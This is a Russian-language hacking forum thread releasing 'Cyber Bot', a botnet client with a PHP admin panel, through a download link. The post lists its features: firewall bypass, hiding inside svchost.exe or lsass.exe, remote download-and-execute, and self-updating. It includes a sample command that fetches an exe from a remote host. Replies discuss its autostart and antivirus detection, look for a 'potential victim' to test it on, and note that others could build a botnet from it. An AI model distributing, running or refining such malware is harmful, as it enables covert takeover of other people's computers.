• XSS.stack #1 – первый литературный журнал от юзеров форума

Cyber Bot

Winux

Старожил форума
Легенда
Регистрация
12.11.2004
Сообщения
6 358
Реакции
53
Cyber Bot v1.1 Beta
Релиз от наших партнеров - команды CyberLords - Cyber Bot. Является неплохим ботом с php админкой. Требует MySQL.
Фичи:
1. обход всех фаеров
2. работа от имени svchost.exe, lsass.exe или любого другого процесса
3. загрузка файлов на компьютер по http:// и ftp://
4. запуск exe файлов
5. возможность обновления бота более новой версией
6. бот получает новые команды только один раз, то есть если боту передать команду на скачивание (get http://test.ru/file.exe) то он скачает этот файл только один раз (а не при каждом заходе бота) и будет ждать новых команд
7. добавленна работа бота под ограниченными правами user или гостя[New$paN]
:zns5: Скачать|Download
 
парни я тут в первый раз вообще...не могли бы вы подсказать как работать с ботами и как их запускать?


ggogle и поиск по форуму тебе в руки, поищи ботов, там ни ра поднималась такая тема...


запускай билдер, дальше все предельно просто и понятно... вводишь адрес к index.ntmp и тд
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ну а почему бы и нет :)
Смотрите сами пароля надоступ к боту нету, у всех одинаковые админки не факт что в боте заложен по дефолту системный url на главную админку и несколько дополнительных команды, щас все ринуться понакачают протроянят а кто-то соберёт очень даже не плохой ботнет...
Помоему эта идея уже стара как этот мир :)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Есть и плохое в боте:
1. Ну уж если вы решили писаться в папку винды ну не ужели так тяжело проактив каспера обойти? Ещё имя такое прикольное argentus.exe :)))
2. Автозагрузка просто поражает, то же баян винлогон\шелл :)
3. Я не совсем догнал действие создание ключа в винлоган под именем test :huh:
Я так предполагаю после успешного внедрения в довереный процесс, всё должно пройти тихо и спокойно выше описаное, но так вот каспер не совсем тупой и он говорит что возможно потенциально опасное приложение, а наглядно я видел что любое сообщения каспера все воспринемают как вирус. :))
Так что думаю надо его переделывать :)
 
хм... не работает :(
скачался, запустился, в БД прописался, а команды не выполянет
Добавлено в [time]1161021210[/time]
посещения растут( я так понял это своеобразный аптайм) но них не происходит
 
Пожалуйста, обратите внимание, что пользователь заблокирован
L0GA4
Ты у себя запускал?
Может вместе проверим, а то ни как не найду потенциальную жертву :))
 
и обычный виндовой фаер спрашивает разрешение на запуск argentus.exe...это обход?
Добавлено в [time]1161021522[/time]
Ты у себя запускал?
Может вместе проверим, а то ни как не найду потенциальную жертву )
ну меня пока не отучили виртуалкой пользоваться ;)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
У меня просто виртуалки нету, а ноутбук гавнять опять не хочеться :))
 
кста,мой антитвирь детектит его как trojan.delphi.downloader или чет в этом-роде.мб модули одинаковые юзаются? :)
 
Ну а почему бы и нет smile.gif
Смотрите сами пароля надоступ к боту нету, у всех одинаковые админки не факт что в боте заложен по дефолту системный url на главную админку и несколько дополнительных команды, щас все ринуться понакачают протроянят а кто-то соберёт очень даже не плохой ботнет...
Помоему эта идея уже стара как этот мир

не спугни народ)))

pixcher - братушкин малорик!
 
ну немогли его до ума довести. ну а размер 11к сжатым этож извращ.

бота на доработку
 
фтопку, такое малофункциональное г даже самый криворукий кодер за полчаса накодить может

>> 1. обход всех фаеров
лол =))))))))))))))))))
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх